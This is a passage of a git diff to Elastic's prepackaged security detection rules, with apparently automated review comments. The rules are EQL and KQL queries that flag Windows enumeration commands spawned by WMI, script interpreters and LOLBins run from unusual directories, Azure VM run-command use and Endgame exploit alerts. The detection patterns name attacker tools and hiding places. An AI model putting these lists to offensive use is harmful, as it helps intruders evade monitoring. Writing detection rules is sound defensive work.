+ "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.",
 "severity": "low",
 "tags": [
 "Elastic",
@@ -53,5 +81,5 @@
 ],
 "timestamp_override": "event.ingested",
 "type": "eql",
- "version": 5
+ "version": 7
 }
diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/execution_command_virtual_machine.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/execution_command_virtual_machine.json
index 1292596404eff..d370b9115ce8e 100644
--- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/execution_command_virtual_machine.json
+++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/execution_command_virtual_machine.json
@@ -14,15 +14,40 @@
 "language": "kuery",
 "license": "Elastic License v2",
 "name": "Azure Command Execution on Virtual Machine",
- "note": "## Config\n\nThe Azure Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule.",
+ "note": "",
 "query": "event.dataset:azure.activitylogs and azure.activitylogs.operation_name:\"MICROSOFT.COMPUTE/VIRTUALMACHINES/RUNCOMMAND/ACTION\" and event.outcome:(Success or success)\n",
 "references": [
 "https://adsecurity.org/?p=4277",
 "https://posts.specterops.io/attacking-azure-azure-ad-and-introducing-powerzure-ca70b330511a",
 "https://docs.microsoft.com/en-us/azure/role-based-access-control/built-in-roles#virtual-machine-contributor"
 ],
+ "related_integrations": [
+ {
+ "integration": "activitylogs",
+ "package": "azure",
+ "version": "0.12.0"
+ }
+ ],
+ "required_fields": [
+ {
+ "ecs": false,
+ "name": "azure.activitylogs.operation_name",
+ "type": "keyword"
+ },
+ {
+ "ecs": true,
+ "name": "event.dataset",
+ "type": "keyword"
+ },
+ {
+ "ecs": true,
+ "name": "event.outcome",
+ "type": "keyword"
+ }
+ ],
 "risk_score": 47,
 "rule_id": "60884af6-f553-4a6c-af13-300047455491",
+ "setup": "The Azure Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule.",
 "severity": "medium",
 "tags": [
 "Elastic",
@@ -51,5 +76,5 @@
 ],
 "timestamp_override": "event.ingested",
 "type": "query",
- "version": 5
+ "version": 7
 }
diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/execution_defense_evasion_electron_app_childproc_node_js.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/execution_defense_evasion_electron_app_childproc_node_js.json
index 4bf6c272e59ae..1033700618ec9 100644
--- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/execution_defense_evasion_electron_app_childproc_node_js.json
+++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/execution_defense_evasion_electron_app_childproc_node_js.json
@@ -17,6 +17,23 @@
 "https://www.trustedsec.com/blog/macos-injection-via-third-party-frameworks/",
 "https://nodejs.org/api/child_process.html"
 ],
+ "required_fields": [
+ {
+ "ecs": true,
+ "name": "event.category",
+ "type": "keyword"
+ },
+ {
+ "ecs": true,
+ "name": "event.type",
+ "type": "keyword"
+ },
+ {
+ "ecs": true,
+ "name": "process.args",
+ "type": "keyword"
+ }
+ ],
 "risk_score": 47,
 "rule_id": "35330ba2-c859-4c98-8b7f-c19159ea0e58",
 "severity": "medium",
@@ -62,5 +79,5 @@
 ],
 "timestamp_override": "event.ingested",
 "type": "query",
- "version": 1
+ "version": 2
 }
diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/execution_endgame_exploit_detected.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/execution_endgame_exploit_detected.json
new file mode 100644
index 0000000000000..0a08eeae69c55
--- /dev/null
+++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/execution_endgame_exploit_detected.json
@@ -0,0 +1,81 @@
+{
+ "author": [
+ "Elastic"
+ ],
+ "description": "Elastic Endgame detected an Exploit. Click the Elastic Endgame icon in the event.module column or the link in the rule.reference column for additional information.",
+ "from": "now-15m",
+ "index": [
+ "endgame-*"
+ ],
+ "interval": "10m",
+ "language": "kuery",
+ "license": "Elastic License v2",
+ "max_signals": 10000,
+ "name": "Exploit - Detected - Elastic Endgame",
+ "query": "event.kind:alert and event.module:endgame and endgame.metadata.type:detection and (event.action:exploit_event or endgame.event_subtype_full:exploit_event)\n",
+ "required_fields": [
+ {
+ "ecs": false,
+ "name": "endgame.event_subtype_full",
+ "type": "unknown"
+ },
+ {
+ "ecs": false,
+ "name": "endgame.metadata.type",
+ "type": "unknown"
+ },
+ {
+ "ecs": true,
+ "name": "event.action",
+ "type": "keyword"
+ },
+ {
+ "ecs": true,
+ "name": "event.kind",
+ "type": "keyword"
+ },
+ {
+ "ecs": true,
+ "name": "event.module",
+ "type": "keyword"
+ }
+ ],
+ "risk_score": 73,
+ "rule_id": "2003cdc8-8d83-4aa5-b132-1f9a8eb48514",
+ "severity": "high",
+ "tags": [
+ "Elastic",
+ "Elastic Endgame",
+ "Threat Detection",
+ "Execution",
+ "Privilege Escalation"
+ ],
+ "threat": [
+ {
+ "framework": "MITRE ATT&CK",
+ "tactic": {
+ "id": "TA0002",
+ "name": "Execution",
+ "reference": "https://attack.mitre.org/tactics/TA0002/"
+ },
+ "technique": []
+ },
+ {
+ "framework": "MITRE ATT&CK",
+ "tactic": {
+ "id": "TA0004",
+ "name": "Privilege Escalation",
+ "reference": "https://attack.mitre.org/tactics/TA0004/"
+ },
+ "technique": [
+ {
+ "id": "T1068",
+ "name": "Exploitation for Privilege Escalation",
+ "reference": "https://attack.mitre.org/techniques/T1068/"
+ }
+ ]
+ }
+ ],
+ "type": "query",
+ "version": 9
+}
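Review bot: `"version": 9` on a file introduced with `new file mode` indicates this is a relocation of an already-shipped prebuilt rule (rule_id `2003cdc8-8d83-4aa5-b132-1f9a8eb48514`) rather than a new rule, presumably a rename that git did not pair because the content changed as well. It is worth confirming that the old-path file for this rule_id is deleted in the same commit — the Endgame deletions visible earlier in this diff carry different rule_ids — since two prepackaged files sharing a rule_id would collide when the rule set is installed or upgraded. The same applies to execution_endgame_exploit_prevented.json (rule_id `2863ffeb-bf77-44dd-b7a5-93ef94b72036`). The Execution tactic entry also carries `"technique": []`; if a tactic-only mapping is intended, a one-line mention in the PR description would stop it being read as an omission.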
diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/execution_endgame_exploit_prevented.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/execution_endgame_exploit_prevented.json
new file mode 100644
index 0000000000000..c75b34c9606eb
--- /dev/null
+++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/execution_endgame_exploit_prevented.json
@@ -0,0 +1,81 @@ +{ + "author": [ + "Elastic" + ], + "description": "Elastic Endgame prevented an Exploit. Click the Elastic Endgame icon in the event.module column or the link in the rule.reference column for additional information.", + "from": "now-15m", + "index": [ + "endgame-*" + ], + "interval": "10m", + "language": "kuery", + "license": "Elastic License v2", + "max_signals": 10000, + "name": "Exploit - Prevented - Elastic Endgame", + "query": "event.kind:alert and event.module:endgame and endgame.metadata.type:prevention and (event.action:exploit_event or endgame.event_subtype_full:exploit_event)\n", + "required_fields": [ + { + "ecs": false, + "name": "endgame.event_subtype_full", + "type": "unknown" + }, + { + "ecs": false, + "name": "endgame.metadata.type", + "type": "unknown" + }, + { + "ecs": true, + "name": "event.action", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.kind", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.module", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": "2863ffeb-bf77-44dd-b7a5-93ef94b72036", + "severity": "medium", + "tags": [ + "Elastic", + "Elastic Endgame", + "Threat Detection", + "Execution", + "Privilege Escalation" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0002", + "name": "Execution", + "reference": "https://attack.mitre.org/tactics/TA0002/" + }, + "technique": [] + }, + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0004", + "name": "Privilege Escalation", + "reference": "https://attack.mitre.org/tactics/TA0004/" + }, + "technique": [ + { + "id": "T1068", + "name": "Exploitation for Privilege Escalation", + "reference": "https://attack.mitre.org/techniques/T1068/" + } + ] + } + ], + "type": "query", + "version": 9 +} 
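Review bot: The Execution tactic entry in `threat` carries `"technique": []`, so the `Execution` tag and the TA0002 mapping point at no technique while the Privilege Escalation entry maps to T1068; if the exploit events this rule covers are meant to include exploitation for execution, T1203 (Exploitation for Client Execution) is the matching ATT&CK technique, otherwise the empty tactic entry should be removed. The prevented and detected variants differ only in `endgame.metadata.type` and the score, so whichever mapping is chosen should be applied to both rule files.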
diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/execution_enumeration_via_wmiprvse.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/execution_enumeration_via_wmiprvse.json index 29a0f88b271ea..dced3401dea99 100644 --- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/execution_enumeration_via_wmiprvse.json +++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/execution_enumeration_via_wmiprvse.json 
@@ -12,10 +12,28 @@ "language": "eql", "license": "Elastic License v2", "name": "Enumeration Command Spawned via WMIPrvSE", - "note": "## Config\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.\n", + "note": "", "query": "process where event.type in (\"start\", \"process_started\") and\n process.name:\n (\n \"arp.exe\",\n \"dsquery.exe\",\n \"dsget.exe\",\n \"gpresult.exe\",\n \"hostname.exe\",\n \"ipconfig.exe\",\n \"nbtstat.exe\",\n \"net.exe\",\n \"net1.exe\",\n \"netsh.exe\",\n \"netstat.exe\",\n \"nltest.exe\",\n \"ping.exe\",\n \"qprocess.exe\",\n \"quser.exe\",\n \"qwinsta.exe\",\n \"reg.exe\",\n \"sc.exe\",\n \"systeminfo.exe\",\n \"tasklist.exe\",\n \"tracert.exe\",\n \"whoami.exe\"\n ) and\n process.parent.name:\"wmiprvse.exe\"\n", + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.parent.name", + "type": "keyword" + } + ], "risk_score": 21, "rule_id": "770e0c4d-b998-41e5-a62e-c7901fd7f470", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "low", "tags": [ "Elastic", @@ -68,5 +86,5 @@ ], "timestamp_override": "event.ingested", "type": "eql", - "version": 3 + "version": 5 } 
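Review bot: Moving the configuration text into `setup` leaves `"note": ""`, an empty string that will render as a blank investigation guide; either drop the key or give it the triage content the rule otherwise lacks. Something like `## Triage and analysis\n\nCheck where the WMI request that drove wmiprvse.exe originated (remote host, scheduled task, management tooling) and whether that source is expected before escalating.` would give analysts a starting point, and it matters here because the rule declares no `false_positives` even though management tooling that executes commands over WMI would presumably produce the same parent/child pairs.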
diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/execution_from_unusual_directory.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/execution_from_unusual_directory.json deleted file mode 100644 index d71469d125d27..0000000000000 --- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/execution_from_unusual_directory.json +++ /dev/null 
@@ -1,30 +0,0 @@ -{ - "author": [ - "Elastic" - ], - "description": "Identifies process execution from suspicious default Windows directories. This is sometimes done by adversaries to hide malware in trusted paths.", - "from": "now-9m", - "index": [ - "winlogbeat-*", - "logs-endpoint.events.*", - "logs-windows.*" - ], - "language": "eql", - "license": "Elastic License v2", - "name": "Process Execution from an Unusual Directory", - "note": "## Config\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.\n", - "query": "process where event.type in (\"start\", \"process_started\", \"info\") and\n /* add suspicious execution paths here */\nprocess.executable : (\"C:\\\\PerfLogs\\\\*.exe\",\"C:\\\\Users\\\\Public\\\\*.exe\",\"C:\\\\Users\\\\Default\\\\*.exe\",\"C:\\\\Windows\\\\Tasks\\\\*.exe\",\"C:\\\\Intel\\\\*.exe\",\"C:\\\\AMD\\\\Temp\\\\*.exe\",\"C:\\\\Windows\\\\AppReadiness\\\\*.exe\",\n\"C:\\\\Windows\\\\ServiceState\\\\*.exe\",\"C:\\\\Windows\\\\security\\\\*.exe\",\"C:\\\\Windows\\\\IdentityCRL\\\\*.exe\",\"C:\\\\Windows\\\\Branding\\\\*.exe\",\"C:\\\\Windows\\\\csc\\\\*.exe\",\n \"C:\\\\Windows\\\\DigitalLocker\\\\*.exe\",\"C:\\\\Windows\\\\en-US\\\\*.exe\",\"C:\\\\Windows\\\\wlansvc\\\\*.exe\",\"C:\\\\Windows\\\\Prefetch\\\\*.exe\",\"C:\\\\Windows\\\\Fonts\\\\*.exe\",\n \"C:\\\\Windows\\\\diagnostics\\\\*.exe\",\"C:\\\\Windows\\\\TAPI\\\\*.exe\",\"C:\\\\Windows\\\\INF\\\\*.exe\",\"C:\\\\Windows\\\\System32\\\\Speech\\\\*.exe\",\"C:\\\\windows\\\\tracing\\\\*.exe\",\n \"c:\\\\windows\\\\IME\\\\*.exe\",\"c:\\\\Windows\\\\Performance\\\\*.exe\",\"c:\\\\windows\\\\intel\\\\*.exe\",\"c:\\\\windows\\\\ms\\\\*.exe\",\"C:\\\\Windows\\\\dot3svc\\\\*.exe\",\"C:\\\\Windows\\\\ServiceProfiles\\\\*.exe\",\n 
\"C:\\\\Windows\\\\panther\\\\*.exe\",\"C:\\\\Windows\\\\RemotePackages\\\\*.exe\",\"C:\\\\Windows\\\\OCR\\\\*.exe\",\"C:\\\\Windows\\\\appcompat\\\\*.exe\",\"C:\\\\Windows\\\\apppatch\\\\*.exe\",\"C:\\\\Windows\\\\addins\\\\*.exe\",\n \"C:\\\\Windows\\\\Setup\\\\*.exe\",\"C:\\\\Windows\\\\Help\\\\*.exe\",\"C:\\\\Windows\\\\SKB\\\\*.exe\",\"C:\\\\Windows\\\\Vss\\\\*.exe\",\"C:\\\\Windows\\\\Web\\\\*.exe\",\"C:\\\\Windows\\\\servicing\\\\*.exe\",\"C:\\\\Windows\\\\CbsTemp\\\\*.exe\",\n \"C:\\\\Windows\\\\Logs\\\\*.exe\",\"C:\\\\Windows\\\\WaaS\\\\*.exe\",\"C:\\\\Windows\\\\twain_32\\\\*.exe\",\"C:\\\\Windows\\\\ShellExperiences\\\\*.exe\",\"C:\\\\Windows\\\\ShellComponents\\\\*.exe\",\"C:\\\\Windows\\\\PLA\\\\*.exe\",\n \"C:\\\\Windows\\\\Migration\\\\*.exe\",\"C:\\\\Windows\\\\debug\\\\*.exe\",\"C:\\\\Windows\\\\Cursors\\\\*.exe\",\"C:\\\\Windows\\\\Containers\\\\*.exe\",\"C:\\\\Windows\\\\Boot\\\\*.exe\",\"C:\\\\Windows\\\\bcastdvr\\\\*.exe\",\n \"C:\\\\Windows\\\\assembly\\\\*.exe\",\"C:\\\\Windows\\\\TextInput\\\\*.exe\",\"C:\\\\Windows\\\\security\\\\*.exe\",\"C:\\\\Windows\\\\schemas\\\\*.exe\",\"C:\\\\Windows\\\\SchCache\\\\*.exe\",\"C:\\\\Windows\\\\Resources\\\\*.exe\",\n \"C:\\\\Windows\\\\rescache\\\\*.exe\",\"C:\\\\Windows\\\\Provisioning\\\\*.exe\",\"C:\\\\Windows\\\\PrintDialog\\\\*.exe\",\"C:\\\\Windows\\\\PolicyDefinitions\\\\*.exe\",\"C:\\\\Windows\\\\media\\\\*.exe\",\n \"C:\\\\Windows\\\\Globalization\\\\*.exe\",\"C:\\\\Windows\\\\L2Schemas\\\\*.exe\",\"C:\\\\Windows\\\\LiveKernelReports\\\\*.exe\",\"C:\\\\Windows\\\\ModemLogs\\\\*.exe\",\"C:\\\\Windows\\\\ImmersiveControlPanel\\\\*.exe\") and\n not process.name : (\"SpeechUXWiz.exe\",\"SystemSettings.exe\",\"TrustedInstaller.exe\",\"PrintDialog.exe\",\"MpSigStub.exe\",\"LMS.exe\",\"mpam-*.exe\")\n /* uncomment once in winlogbeat */\n /* and not (process.code_signature.subject_name == \"Microsoft Corporation\" and process.code_signature.trusted == true) */\n", - "risk_score": 47, - "rule_id": 
"ebfe1448-7fac-4d59-acea-181bd89b1f7f", - "severity": "medium", - "tags": [ - "Elastic", - "Host", - "Windows", - "Threat Detection", - "Execution" - ], - "timestamp_override": "event.ingested", - "type": "eql", - "version": 4 -} diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/execution_from_unusual_path_cmdline.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/execution_from_unusual_path_cmdline.json index d7aff0ae809c5..4372ccb067b3b 100644 --- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/execution_from_unusual_path_cmdline.json +++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/execution_from_unusual_path_cmdline.json 
@@ -12,19 +12,82 @@ "language": "eql", "license": "Elastic License v2", "name": "Execution from Unusual Directory - Command Line", - "note": "## Triage and analysis\n\nThis is related to the `Process Execution from an Unusual Directory rule`.\n\n## Config\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.\n", - "query": "process where event.type in (\"start\", \"process_started\", \"info\") and\n process.name : (\"wscript.exe\", \n \"cscript.exe\", \n \"rundll32.exe\", \n \"regsvr32.exe\", \n \"cmstp.exe\",\n \"RegAsm.exe\",\n \"installutil.exe\",\n \"mshta.exe\",\n \"RegSvcs.exe\", \n \"powershell.exe\", \n \"pwsh.exe\", \n \"cmd.exe\") and\n \n /* add suspicious execution paths here */\n process.args : (\"C:\\\\PerfLogs\\\\*\",\n \"C:\\\\Users\\\\Public\\\\*\",\n \"C:\\\\Users\\\\Default\\\\*\",\n \"C:\\\\Windows\\\\Tasks\\\\*\",\n \"C:\\\\Intel\\\\*\", \n \"C:\\\\AMD\\\\Temp\\\\*\", \n \"C:\\\\Windows\\\\AppReadiness\\\\*\", \n \"C:\\\\Windows\\\\ServiceState\\\\*\",\n \"C:\\\\Windows\\\\security\\\\*\",\n \"C:\\\\Windows\\\\IdentityCRL\\\\*\",\n \"C:\\\\Windows\\\\Branding\\\\*\",\n \"C:\\\\Windows\\\\csc\\\\*\",\n \"C:\\\\Windows\\\\DigitalLocker\\\\*\",\n \"C:\\\\Windows\\\\en-US\\\\*\",\n \"C:\\\\Windows\\\\wlansvc\\\\*\",\n \"C:\\\\Windows\\\\Prefetch\\\\*\",\n \"C:\\\\Windows\\\\Fonts\\\\*\",\n \"C:\\\\Windows\\\\diagnostics\\\\*\",\n \"C:\\\\Windows\\\\TAPI\\\\*\",\n \"C:\\\\Windows\\\\INF\\\\*\",\n \"C:\\\\Windows\\\\System32\\\\Speech\\\\*\",\n \"C:\\\\windows\\\\tracing\\\\*\",\n \"c:\\\\windows\\\\IME\\\\*\",\n \"c:\\\\Windows\\\\Performance\\\\*\",\n \"c:\\\\windows\\\\intel\\\\*\",\n \"c:\\\\windows\\\\ms\\\\*\",\n \"C:\\\\Windows\\\\dot3svc\\\\*\",\n \"C:\\\\Windows\\\\ServiceProfiles\\\\*\",\n 
\"C:\\\\Windows\\\\panther\\\\*\",\n \"C:\\\\Windows\\\\RemotePackages\\\\*\",\n \"C:\\\\Windows\\\\OCR\\\\*\",\n \"C:\\\\Windows\\\\appcompat\\\\*\",\n \"C:\\\\Windows\\\\apppatch\\\\*\",\n \"C:\\\\Windows\\\\addins\\\\*\",\n \"C:\\\\Windows\\\\Setup\\\\*\",\n \"C:\\\\Windows\\\\Help\\\\*\",\n \"C:\\\\Windows\\\\SKB\\\\*\",\n \"C:\\\\Windows\\\\Vss\\\\*\",\n \"C:\\\\Windows\\\\Web\\\\*\",\n \"C:\\\\Windows\\\\servicing\\\\*\",\n \"C:\\\\Windows\\\\CbsTemp\\\\*\",\n \"C:\\\\Windows\\\\Logs\\\\*\",\n \"C:\\\\Windows\\\\WaaS\\\\*\",\n \"C:\\\\Windows\\\\twain_32\\\\*\",\n \"C:\\\\Windows\\\\ShellExperiences\\\\*\",\n \"C:\\\\Windows\\\\ShellComponents\\\\*\",\n \"C:\\\\Windows\\\\PLA\\\\*\",\n \"C:\\\\Windows\\\\Migration\\\\*\",\n \"C:\\\\Windows\\\\debug\\\\*\",\n \"C:\\\\Windows\\\\Cursors\\\\*\",\n \"C:\\\\Windows\\\\Containers\\\\*\",\n \"C:\\\\Windows\\\\Boot\\\\*\",\n \"C:\\\\Windows\\\\bcastdvr\\\\*\",\n \"C:\\\\Windows\\\\assembly\\\\*\",\n \"C:\\\\Windows\\\\TextInput\\\\*\",\n \"C:\\\\Windows\\\\security\\\\*\",\n \"C:\\\\Windows\\\\schemas\\\\*\",\n \"C:\\\\Windows\\\\SchCache\\\\*\",\n \"C:\\\\Windows\\\\Resources\\\\*\",\n \"C:\\\\Windows\\\\rescache\\\\*\",\n \"C:\\\\Windows\\\\Provisioning\\\\*\",\n \"C:\\\\Windows\\\\PrintDialog\\\\*\",\n \"C:\\\\Windows\\\\PolicyDefinitions\\\\*\",\n \"C:\\\\Windows\\\\media\\\\*\",\n \"C:\\\\Windows\\\\Globalization\\\\*\",\n \"C:\\\\Windows\\\\L2Schemas\\\\*\",\n \"C:\\\\Windows\\\\LiveKernelReports\\\\*\",\n \"C:\\\\Windows\\\\ModemLogs\\\\*\",\n \"C:\\\\Windows\\\\ImmersiveControlPanel\\\\*\",\n \"C:\\\\$Recycle.Bin\\\\*\") and\n not process.parent.executable : (\"C:\\\\WINDOWS\\\\System32\\\\DriverStore\\\\FileRepository\\\\*\\\\igfxCUIService*.exe\",\n \"C:\\\\Windows\\\\System32\\\\spacedeskService.exe\",\n \"C:\\\\Program Files\\\\Dell\\\\SupportAssistAgent\\\\SRE\\\\SRE.exe\") and\n not (process.name : \"rundll32.exe\" and process.args : (\"uxtheme.dll,#64\", \"PRINTUI.DLL,PrintUIEntry\"))\n", + "note": "## 
Triage and analysis\n\nThis is related to the `Process Execution from an Unusual Directory rule`.", + "query": "process where event.type in (\"start\", \"process_started\", \"info\") and\n process.name : (\"wscript.exe\",\n \"cscript.exe\",\n \"rundll32.exe\",\n \"regsvr32.exe\",\n \"cmstp.exe\",\n \"RegAsm.exe\",\n \"installutil.exe\",\n \"mshta.exe\",\n \"RegSvcs.exe\",\n \"powershell.exe\",\n \"pwsh.exe\",\n \"cmd.exe\") and\n\n /* add suspicious execution paths here */\n process.args : (\"C:\\\\PerfLogs\\\\*\",\n \"C:\\\\Users\\\\Public\\\\*\",\n \"C:\\\\Windows\\\\Tasks\\\\*\",\n \"C:\\\\Intel\\\\*\",\n \"C:\\\\AMD\\\\Temp\\\\*\",\n \"C:\\\\Windows\\\\AppReadiness\\\\*\",\n \"C:\\\\Windows\\\\ServiceState\\\\*\",\n \"C:\\\\Windows\\\\security\\\\*\",\n \"C:\\\\Windows\\\\IdentityCRL\\\\*\",\n \"C:\\\\Windows\\\\Branding\\\\*\",\n \"C:\\\\Windows\\\\csc\\\\*\",\n \"C:\\\\Windows\\\\DigitalLocker\\\\*\",\n \"C:\\\\Windows\\\\en-US\\\\*\",\n \"C:\\\\Windows\\\\wlansvc\\\\*\",\n \"C:\\\\Windows\\\\Prefetch\\\\*\",\n \"C:\\\\Windows\\\\Fonts\\\\*\",\n \"C:\\\\Windows\\\\diagnostics\\\\*\",\n \"C:\\\\Windows\\\\TAPI\\\\*\",\n \"C:\\\\Windows\\\\INF\\\\*\",\n \"C:\\\\Windows\\\\System32\\\\Speech\\\\*\",\n \"C:\\\\windows\\\\tracing\\\\*\",\n \"c:\\\\windows\\\\IME\\\\*\",\n \"c:\\\\Windows\\\\Performance\\\\*\",\n \"c:\\\\windows\\\\intel\\\\*\",\n \"c:\\\\windows\\\\ms\\\\*\",\n \"C:\\\\Windows\\\\dot3svc\\\\*\",\n \"C:\\\\Windows\\\\panther\\\\*\",\n \"C:\\\\Windows\\\\RemotePackages\\\\*\",\n \"C:\\\\Windows\\\\OCR\\\\*\",\n \"C:\\\\Windows\\\\appcompat\\\\*\",\n \"C:\\\\Windows\\\\apppatch\\\\*\",\n \"C:\\\\Windows\\\\addins\\\\*\",\n \"C:\\\\Windows\\\\Setup\\\\*\",\n \"C:\\\\Windows\\\\Help\\\\*\",\n \"C:\\\\Windows\\\\SKB\\\\*\",\n \"C:\\\\Windows\\\\Vss\\\\*\",\n \"C:\\\\Windows\\\\servicing\\\\*\",\n \"C:\\\\Windows\\\\CbsTemp\\\\*\",\n \"C:\\\\Windows\\\\Logs\\\\*\",\n \"C:\\\\Windows\\\\WaaS\\\\*\",\n \"C:\\\\Windows\\\\twain_32\\\\*\",\n 
\"C:\\\\Windows\\\\ShellExperiences\\\\*\",\n \"C:\\\\Windows\\\\ShellComponents\\\\*\",\n \"C:\\\\Windows\\\\PLA\\\\*\",\n \"C:\\\\Windows\\\\Migration\\\\*\",\n \"C:\\\\Windows\\\\debug\\\\*\",\n \"C:\\\\Windows\\\\Cursors\\\\*\",\n \"C:\\\\Windows\\\\Containers\\\\*\",\n \"C:\\\\Windows\\\\Boot\\\\*\",\n \"C:\\\\Windows\\\\bcastdvr\\\\*\",\n \"C:\\\\Windows\\\\TextInput\\\\*\",\n \"C:\\\\Windows\\\\security\\\\*\",\n \"C:\\\\Windows\\\\schemas\\\\*\",\n \"C:\\\\Windows\\\\SchCache\\\\*\",\n \"C:\\\\Windows\\\\Resources\\\\*\",\n \"C:\\\\Windows\\\\rescache\\\\*\",\n \"C:\\\\Windows\\\\Provisioning\\\\*\",\n \"C:\\\\Windows\\\\PrintDialog\\\\*\",\n \"C:\\\\Windows\\\\PolicyDefinitions\\\\*\",\n \"C:\\\\Windows\\\\media\\\\*\",\n \"C:\\\\Windows\\\\Globalization\\\\*\",\n \"C:\\\\Windows\\\\L2Schemas\\\\*\",\n \"C:\\\\Windows\\\\LiveKernelReports\\\\*\",\n \"C:\\\\Windows\\\\ModemLogs\\\\*\",\n \"C:\\\\Windows\\\\ImmersiveControlPanel\\\\*\",\n \"C:\\\\$Recycle.Bin\\\\*\") and\n\n /* noisy FP patterns */\n\n not process.parent.executable : (\"C:\\\\WINDOWS\\\\System32\\\\DriverStore\\\\FileRepository\\\\*\\\\igfxCUIService*.exe\",\n \"C:\\\\Windows\\\\System32\\\\spacedeskService.exe\",\n \"C:\\\\Program Files\\\\Dell\\\\SupportAssistAgent\\\\SRE\\\\SRE.exe\") and\n not (process.name : \"rundll32.exe\" and\n process.args : (\"uxtheme.dll,#64\",\n \"PRINTUI.DLL,PrintUIEntry\",\n \"?:\\\\Windows\\\\System32\\\\FirewallControlPanel.dll,ShowNotificationDialog\",\n \"?:\\\\WINDOWS\\\\system32\\\\Speech\\\\SpeechUX\\\\sapi.cpl\",\n \"?:\\\\Windows\\\\system32\\\\shell32.dll,OpenAs_RunDLL\")) and\n\n not (process.name : \"cscript.exe\" and process.args : \"?:\\\\WINDOWS\\\\system32\\\\calluxxprovider.vbs\") and\n\n not (process.name : \"cmd.exe\" and process.args : \"?:\\\\WINDOWS\\\\system32\\\\powercfg.exe\" and process.args : \"?:\\\\WINDOWS\\\\inf\\\\PowerPlan.log\") and\n\n not (process.name : \"regsvr32.exe\" and process.args : 
\"?:\\\\Windows\\\\Help\\\\OEM\\\\scripts\\\\checkmui.dll\") and\n\n not (process.name : \"cmd.exe\" and\n process.parent.executable : (\"?:\\\\Windows\\\\System32\\\\oobe\\\\windeploy.exe\",\n \"?:\\\\Program Files (x86)\\\\ossec-agent\\\\wazuh-agent.exe\",\n \"?:\\\\Windows\\\\System32\\\\igfxCUIService.exe\",\n \"?:\\\\Windows\\\\Temp\\\\IE*.tmp\\\\IE*-support\\\\ienrcore.exe\"))\n", + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.args", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.parent.executable", + "type": "keyword" + } + ], "risk_score": 47, "rule_id": "cff92c41-2225-4763-b4ce-6f71e5bda5e6", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "medium", "tags": [ "Elastic", "Host", "Windows", "Threat Detection", - "Execution" + "Execution", + "Defense Evasion" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0002", + "name": "Execution", + "reference": "https://attack.mitre.org/tactics/TA0002/" + }, + "technique": [ + { + "id": "T1059", + "name": "Command and Scripting Interpreter", + "reference": "https://attack.mitre.org/techniques/T1059/" + } + ] + }, + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0005", + "name": "Defense Evasion", + "reference": "https://attack.mitre.org/tactics/TA0005/" + }, + 